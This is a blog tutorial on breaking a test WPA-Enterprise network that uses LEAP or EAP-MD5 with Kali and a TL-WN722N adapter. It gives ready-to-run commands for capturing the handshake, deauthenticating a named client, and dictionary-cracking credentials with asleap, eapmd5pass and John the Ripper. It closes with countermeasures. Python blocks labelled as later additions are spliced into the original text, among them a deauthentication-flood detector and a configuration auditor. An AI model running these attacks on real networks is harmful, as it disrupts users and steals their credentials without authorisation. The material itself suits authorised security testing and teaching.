Monday, February 17, 2014

Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part I

By Tony Lee


In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, a WPA Pre-Shared Key (PSK) network, a network hiding its SSID, and a MAC filtering network to showcase the abilities of this inexpensive and flexible setup.
In this article we will round out our tests by attacking a test WPA-Enterprise network that uses LEAP or EAP-MD5.  Our next article (Part II) will cover WPA-Enterprise PEAP and EAP-TLS.

Figure 1:  Our setup
Consult our previous WEP article for the following topics as they are omitted from this article due to similarity:
  • Equipment
    • Hardware
    • Software
  • Tips and tricks
    • Version of Workstation
    • Screen Resolution
    • Simple Text Editor
  • Connecting the USB Device


  • Preparation
  • WPA-Enterprise Refresher
  • Discovery
  • Attack
    • LEAP and EAP-MD5 Explained
    • Setting the Variables
    • Capture the Handshake
    • Deauthenticate the Client
    • Brute-force the Credentials
      • MSCHAPv2
      • EAP-MD5
  • Countermeasures
  • Conclusion


Preparation

NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks.  To prevent any interference, we will disable it ahead of time.

root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.

WPA-Enterprise Refresher

We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company.  After all, you wouldn’t want an ex-employee still being able to connect to the network after their departure--would you?  This is a security issue in any company that has regular turnover.  So what is the alternative?  WPA-Enterprise of course!
WPA-Enterprise is ideal for large organizations because it does not use a single shared key that all users use to connect to the wireless network.  Each user has their own account (usually username and password) that they use to authenticate to the network.  Best of all, these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP.  When an employee leaves the company and their account is terminated in Active Directory, their wireless access is terminated with it, provided authentication is passed through to that directory.
The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs).  This allows multiple implementations and increased flexibility for corporations.  This flexibility is a double-edged sword though, as not all EAP types are created equal (in terms of security or ease of deployment).  The EAP types we will discuss in this article are LEAP and EAP-MD5; the others are listed below for completeness:
  • LEAP - Lightweight EAP
    • Credentials are sent without SSL tunnel protection, using the MS-CHAP authentication protocol.
    • “[P]roprietary wireless LAN authentication method developed by Cisco Systems”
    • “LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected.”
    • “Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password cracking.”
  • EAP-MD5
    • Credentials are sent without tunnel protection, using an MD5 challenge/response that can be attacked offline with a dictionary.
  • PEAP - (Protected EAP)
    • “[E]ncapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel”
    • “Jointly developed by Cisco Systems, Microsoft, and RSA Security.”
    • “Requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server”
    • Most common inner authentication protocols are MSCHAPv2 and GTC (tokens)
  • EAP-TLS - (EAP-Transport Layer Security)
    • “[U]ses PKI to secure communication to a RADIUS authentication server or another type of authentication server.”
    • “Though it is rarely deployed, EAP-TLS is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software.”
    • Requires client-side certificate, which prevents many organizations from using it.
  • EAP-FAST - (Flexible Authentication via Secure Tunneling)
    • “[A] protocol proposal by Cisco Systems as a replacement for LEAP.”
    • “Use of server certificates is optional in EAP-FAST.”
    • “EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified.”
    • “When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability where an attacker can intercept the PAC and use that to compromise user credentials.”

Discovery (kismet)

In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks.  This is also the case here.  Take a look below at the information that iwlist provides.

root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                   Extra: Last beacon: 96ms ago
                   IE: Unknown: 000B436F72704E6574776F726B
                   IE: Unknown: 010482840B16
                   IE: Unknown: 030101
                   IE: IEEE 802.11i/WPA2 Version 1
                       Group Cipher : TKIP
                       Pairwise Ciphers (2) : CCMP TKIP
                       Authentication Suites (1) : 802.1x

Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type.  For this we use Wireshark to inspect the packets.  Let’s capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into “Monitor” mode.
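As an added example (not part of the original article), the following Python parses the iwlist cell shown above: it decodes the three IEs that iwlist prints as "Unknown" raw hex (tag 0 is the SSID, tag 1 the supported rates, tag 3 the channel) and classifies the authentication suite.  It shows that the scan already tells a defender everything except the EAP type.  The sample text is the cell block reproduced from above; the function names are my own.

```python
import re

# Constructed sample: the iwlist cell block reproduced from the scan above.
IWLIST_CELL = """\
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                   Extra: Last beacon: 96ms ago
                   IE: Unknown: 000B436F72704E6574776F726B
                   IE: Unknown: 010482840B16
                   IE: Unknown: 030101
                   IE: IEEE 802.11i/WPA2 Version 1
                       Group Cipher : TKIP
                       Pairwise Ciphers (2) : CCMP TKIP
                       Authentication Suites (1) : 802.1x
"""

def decode_ie(hex_ie):
    """Decode one 802.11 information element given as hex: tag, length, value."""
    raw = bytes.fromhex(hex_ie)
    tag, length, value = raw[0], raw[1], raw[2:]
    if length != len(value):
        raise ValueError("IE length field does not match payload")
    if tag == 0:      # SSID
        return ("SSID", value.decode("ascii", errors="replace"))
    if tag == 1:      # Supported rates: units of 500 kbit/s, top bit marks a basic rate
        return ("Rates", [(b & 0x7F) / 2 for b in value])
    if tag == 3:      # DS Parameter Set: current channel
        return ("Channel", value[0])
    return ("IE%d" % tag, value.hex())

def classify_cell(text):
    """Summarise an iwlist cell: SSID/rates/channel from raw IEs, auth type from RSN lines."""
    info = {}
    for m in re.finditer(r"IE: Unknown: ([0-9A-Fa-f]+)", text):
        name, val = decode_ie(m.group(1))
        info[name] = val
    auth = re.search(r"Authentication Suites.*?:\s*(\S+)", text)
    suite = auth.group(1) if auth else None
    if suite == "802.1x":
        info["Auth"] = "WPA-Enterprise"   # EAP type is still unknown at this point
    elif suite == "PSK":
        info["Auth"] = "WPA-PSK"
    else:
        info["Auth"] = "open/WEP or unknown"
    return info

if __name__ == "__main__":
    print(classify_cell(IWLIST_CELL))
```

The decoded rates (1, 2, 5.5, 11 Mb/s) and channel (1) match the "Bit Rates" line and the $CH value noted later, which is a useful sanity check that the raw IE decoding is right.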

root@kali:~# airmon-ng start wlan0

We first use airodump-ng without any options in order to discover the network we want to examine and its details.  After we obtain this information, we focus our collection efforts by locking onto the channel and AP.

airodump-ng -c <CHANNEL> --bssid  <APMAC> -w <FILE PREFIX> <INT>

-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on

airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0

Figure 2:  airodump-ng is detecting wireless networks
From this screenshot, we will note a few items for the attack later:

Variable   Description       Value
$ESSID     ESSID             CorpNetwork
$CH        Channel           1
$AP        AP MAC            A0:F3:C1:0C:B6:46
$VM        Victim user MAC   24:77:03:8C:D3:44

Now that our capture is running, we can inspect the packets with Wireshark.  In order to discover the EAP type, we can use Wireshark’s “Statistics -> Protocol Hierarchy” feature.  Look for 802.1X Authentication and apply a filter to those selected packets.  A shortcut would be to type “eapol” in the display filters.
Figure 3:  Wireshark Protocol Hierarchy feature
After applying the filters, we see that the EAP type is Cisco’s Lightweight EAP (LEAP).
Figure 4:  EAP type is LEAP
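The Protocol Hierarchy step above amounts to reading the Type field of the EAP packets carried inside EAPOL frames.  Added example, not from the original article: a minimal EAPOL/EAP parser in Python that reports the EAP type the way Wireshark does, which a defender can run over a capture to inventory which EAP types are actually in use.  The sample frames are constructed inside the block (build_eapol is a helper of mine); the type numbers are the IANA-assigned EAP method types.

```python
import struct

# IANA EAP method types (subset relevant to this article)
EAP_TYPES = {
    1: "Identity", 2: "Notification", 3: "Legacy Nak",
    4: "EAP-MD5", 13: "EAP-TLS", 17: "LEAP", 21: "EAP-TTLS",
    25: "PEAP", 43: "EAP-FAST",
}
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}

def parse_eapol(frame):
    """Return (EAP code name, EAP type name) for an EAPOL frame.
    EAPOL-Key frames (the 4-way handshake itself) carry no EAP packet."""
    if len(frame) < 4:
        raise ValueError("short EAPOL header")
    version, ptype, plen = struct.unpack("!BBH", frame[:4])
    if ptype != 0:   # 0 = EAP-Packet, 3 = EAPOL-Key
        return ("EAPOL-Key" if ptype == 3 else "EAPOL-type-%d" % ptype, None)
    body = frame[4:4 + plen]
    if len(body) < 4:
        raise ValueError("short EAP header")
    code, ident, elen = struct.unpack("!BBH", body[:4])
    if elen > len(body):
        raise ValueError("EAP length exceeds EAPOL payload")
    code_name = EAP_CODES.get(code, "Code%d" % code)
    if code in (3, 4):        # Success/Failure have no Type field
        return (code_name, None)
    etype = body[4]
    return (code_name, EAP_TYPES.get(etype, "EAP-type-%d" % etype))

def build_eapol(code, ident, eap_type, data=b""):
    """Construct an EAPOL/EAP frame; used only to build sample input here."""
    eap = struct.pack("!BBHB", code, ident, 5 + len(data), eap_type) + data
    return struct.pack("!BBH", 1, 0, len(eap)) + eap

# Constructed samples: a LEAP request (LEAP version 1, 8-byte challenge, name)
# and an EAP-MD5 request (value-size 16, 16-byte challenge).
LEAP_REQUEST = build_eapol(1, 2, 17, bytes([1, 0, 8]) + bytes(8) + b"CorpNetwork")
MD5_REQUEST = build_eapol(1, 3, 4, bytes([16]) + bytes(16))
EAP_SUCCESS = bytes([1, 0, 0, 4, 3, 5, 0, 4])

def summarize(frames):
    """Count EAP types seen in a list of frames, like the Protocol Hierarchy view."""
    seen = {}
    for f in frames:
        _, name = parse_eapol(f)
        if name:
            seen[name] = seen.get(name, 0) + 1
    return seen

if __name__ == "__main__":
    print(summarize([LEAP_REQUEST, LEAP_REQUEST, MD5_REQUEST, EAP_SUCCESS]))
```

In a real capture the EAPOL payload sits after the 802.11 header and the LLC/SNAP header (EtherType 0x888E); the Wireshark "eapol" display filter does that stripping for you.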


Attack

Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for LEAP and EAP-MD5.  The outline below can be used for these two similar attack scenarios:
  • LEAP - Lightweight EAP
    • Capture 4-way handshake
    • Crack MSCHAPv2 with asleap and a dictionary
  • EAP-MD5
    • Capture 4-way handshake
    • Crack EAP-MD5 with eapmd5pass and a dictionary

LEAP & EAP-MD5 Explained

Since LEAP and EAP-MD5 do not use a secure tunnel to pass the authentication protocol, we just need to sniff the traffic and crack the password using an offline brute-force attack.  Similar to the WPA-PSK attack, all of the information needed to crack the credentials is contained within the 4-way handshake, thus the attack will be very similar:
  • Set the variables
  • Start the capture
  • Deauthenticate the client
  • Crack the credentials

Setting the Variables

In our example, the victim information is summarized below:

Variable   Description       Value
$ESSID     ESSID             CorpNetwork
$CH        Channel           1
$AP        AP MAC            A0:F3:C1:0C:B6:46
$VM        Victim user MAC   24:77:03:8C:D3:44

Since this is a good amount of information that can be easily mistyped (one number off on a MAC address), we use shell variables when attacking wireless networks.  Additionally, it is a bit of a pain to type the same values into multiple different windows.
It is good practice to open 2-3 windows and copy the following into each window to set the variables:

export ESSID=CorpNetwork
export CH=1
export AP=A0:F3:C1:0C:B6:46
export VM=24:77:03:8C:D3:44

Now that we have our windows set up and environment variables set to our victim, let’s begin the attack.  If you want to change your MAC address for extra stealth, now is the time to do so.

Capture the Handshake

We begin by capturing the traffic in an attempt to capture the 4-way handshake.  This is a convenient way to start because it also locks us on to the channel of the AP of interest (in this example, the channel we stored in $CH).

airodump-ng -c <CHANNEL> --bssid  <APMAC> -w <FILE PREFIX> <INT>

-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on

airodump-ng -c $CH --bssid $AP -w WPA-LEAPcapture mon0

Deauthenticate the Client

The goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network.  Upon client reauthentication, we can capture their 4-way handshake.

aireplay-ng -0 25 -a <AP> -c <VICTIM_MAC> <INT>

-0 = (same as --deauth) deauthentication attack
-a = MAC address of the AP
-c = Victim MAC address
<INT> = Interface we will be attacking from

aireplay-ng -0 25 -a $AP -c $VM mon0

When you are watching your attack take place, keep an eye on the top right-hand corner of the capture window.  The following message should appear when you have successfully captured the 4-way handshake:  “WPA handshake:  XX:XX:XX:XX:XX:XX” (where X’s are the MAC address (BSSID) of the AP you are interested in).  Feel free to stop the capture process with Control+c after the handshake is captured.
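From the defender's side, the deauthentication step above is noisy: a burst of deauthentication frames carrying the AP's address as source is exactly the signature a wireless IDS looks for.  Added example, not from the original article: a Python detector that parses raw 802.11 management frames (radiotap header already stripped) and flags any source address that sends more than a threshold of deauthentication frames within a one-second window.  The frames are constructed in the block for test input; the MAC addresses are the AP and client from the tables above, and the function names are my own.

```python
import struct
from collections import defaultdict

AP_MAC = bytes.fromhex("A0F3C10CB646")       # AP from the tables above
CLIENT_MAC = bytes.fromhex("2477038CD344")   # victim client from the tables above

def mac_str(b):
    return ":".join("%02X" % x for x in b)

def parse_mgmt_frame(frame):
    """Parse a raw 802.11 frame header (no radiotap). Returns a dict for
    deauthentication frames (type 0, subtype 12) and None for anything else."""
    if len(frame) < 26:
        return None
    fc0, fc1, duration = struct.unpack("<BBH", frame[:4])
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype != 12:
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack("<H", frame[24:26])[0]   # reason code follows the 24-byte header
    return {"dst": mac_str(addr1), "src": mac_str(addr2),
            "bssid": mac_str(addr3), "reason": reason}

def build_deauth(src, dst, bssid, reason=7):
    """Construct a deauthentication frame as sample input for the detector."""
    fc = bytes([0xC0, 0x00])                       # management / deauthentication
    hdr = fc + struct.pack("<H", 0) + dst + src + bssid + struct.pack("<H", 0)
    return hdr + struct.pack("<H", reason)

def sample_capture():
    """Constructed sample: one ordinary deauth at t=0, then 30 frames carrying
    the AP's address as source within a third of a second (the attack pattern)."""
    frames = [(0.0, build_deauth(AP_MAC, CLIENT_MAC, AP_MAC, reason=3))]
    for i in range(30):
        frames.append((5.0 + i * 0.01, build_deauth(AP_MAC, CLIENT_MAC, AP_MAC)))
    return frames

def detect_deauth_flood(timed_frames, window=1.0, threshold=10):
    """Return {source MAC: peak count} for sources exceeding `threshold`
    deauthentication frames inside any `window`-second span."""
    per_src = defaultdict(list)
    for ts, frame in timed_frames:
        d = parse_mgmt_frame(frame)
        if d:
            per_src[d["src"]].append(ts)
    alerts = {}
    for src, times in per_src.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1          # slide the window forward
            count = end - start + 1
            if count > threshold:
                alerts[src] = max(alerts.get(src, 0), count)
    return alerts

if __name__ == "__main__":
    print(detect_deauth_flood(sample_capture()))
```

Because the injected frames spoof the AP's address, the alert names the AP as the "sender"; a single legitimate deauthentication from the AP (the first frame in the sample) stays below the threshold and is not reported.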

Brute-force the Credentials

Since the attack on these WPA-Enterprise inner authentication protocols is an offline brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program.  The rockyou.txt wordlist shipped with Kali under /usr/share/wordlists is a good start, as it contains almost 14.5 million passwords.  In order to use the wordlist, you will have to uncompress it as shown below:

root@kali:/usr/share/wordlists# ls

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz

root@kali:/usr/share/wordlists# ls

root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt


After uncompressing the wordlist, run asleap as shown below:

root@kali:~# asleap
asleap 2.2 - actively recover LEAP/PPTP passwords. <>
asleap: Must supply an interface with -i, or a stored file with -r
Usage: asleap [options]

-r Read from a libpcap file
-i Interface to capture on
-f Dictionary file with NT hashes
-n Index file for NT hashes
-s Skip the check to make sure authentication was successful
-h Output this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
-C Challenge value in colon-delimited bytes
-R Response value in colon-delimited bytes
-W ASCII dictionary file (special purpose)

root@kali:~# asleap -W /usr/share/wordlists/rockyou.txt -r WPA-LEAPcapture-01.cap

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout

Feed JTR permutations into asleap:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -r <PCAP>

/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -r WPA-LEAPcapture-01.cap


In this case, LEAP was used--however if EAP-MD5 is used, the attack is very similar using the eapmd5pass tool:

root@kali:~# eapmd5pass
eapmd5pass - Dictionary attack against EAP-MD5

Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options]

 -i <iface> interface name
 -r <pcapfile> read from a named libpcap file
 -w <wordfile> use wordfile for possible passwords.
 -b <bssid> BSSID of target network (default: all)
 -U <username> Username of EAP-MD5 user.
 -C <chal> EAP-MD5 challenge value.
 -R <response> EAP-MD5 response value.
 -E <eapid> EAP-MD5 response EAP ID value.
 -v increase verbosity level (max 3)
 -V version information
 -h usage information

The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together.  Use -r when a packet capture is available.  Specify the username, challenge and response when available through other means.

root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout

Feed JTR permutations into eapmd5pass:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP>

/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap


Countermeasures

Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise LEAP or EAP-MD5 security, we feel that it is important to note that neither should be used for a secure wireless implementation.  That said, we perform many wireless assessments in which we discover that some clients are using these EAP types.  When this is the case, we recommend that clients switch to a more secure EAP type that uses an encrypted tunnel, such as PEAP or EAP-TLS, with the caution that they securely configure the wireless clients (more about this in the next article).
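One way to act on the recommendation above is to audit the supplicant configuration pushed to clients.  Added example, not from the original article: a Python check over wpa_supplicant-style network blocks that flags eap=LEAP and eap=MD5 as insecure, and flags tunnelled EAP types configured without a ca_cert (a client that does not verify the RADIUS server's certificate is the misconfiguration the next article concerns).  The configuration snippets are constructed samples; the key names (ssid, key_mgmt, eap, ca_cert, phase2) are wpa_supplicant's own, and the audit logic and function names are mine.

```python
import re

# Constructed sample: the weak configuration, as found on assessments
WEAK_CONF = """
network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=LEAP
    identity="jdoe"
    password="placeholder-password"
}
"""

# Constructed sample: tunnelled EAP, but the server certificate is never checked
UNVERIFIED_CONF = """
network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed sample: the corrected configuration
GOOD_CONF = """
network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="placeholder-password"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    phase2="auth=MSCHAPV2"
}
"""

WEAK_EAP = {
    "LEAP": "MS-CHAP exchange is sent without a TLS tunnel; offline dictionary attack",
    "MD5": "MD5 challenge/response is sent in the clear; offline dictionary attack",
}
TUNNELED_EAP = {"PEAP", "TTLS", "TLS", "FAST"}

def parse_networks(conf):
    """Return one dict per network={...} block, key -> value with quotes stripped."""
    nets = []
    for block in re.findall(r"network=\{(.*?)\}", conf, re.S):
        net = {}
        for line in block.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                k, v = line.split("=", 1)
                net[k.strip()] = v.strip().strip('"')
        nets.append(net)
    return nets

def audit(conf):
    """Return a list of (ssid, finding) for WPA-EAP networks with weak settings."""
    findings = []
    for net in parse_networks(conf):
        ssid = net.get("ssid", "?")
        if net.get("key_mgmt") != "WPA-EAP":
            continue                      # PSK/open networks are outside this check
        eap = net.get("eap", "").upper()
        if eap in WEAK_EAP:
            findings.append((ssid, "weak EAP type %s: %s" % (eap, WEAK_EAP[eap])))
        elif eap in TUNNELED_EAP and "ca_cert" not in net:
            findings.append((ssid, "%s without ca_cert: client will not verify the RADIUS server certificate" % eap))
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("unverified", UNVERIFIED_CONF), ("good", GOOD_CONF)):
        print(name, audit(conf))
```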
Conclusion

In this article, we demonstrated the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise LEAP and EAP-MD5 test network.  For just $16 and with no reboot required, you can place a wireless adapter into monitor mode and start assessing wireless networks.  More testing needs to be done with this setup to determine other capabilities; however, as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing.  Feedback below is always appreciated.
If you try this with different cards and run into issues, check the following excellent resource:

Special Thanks

Dan Dumond

Rudolph Araujo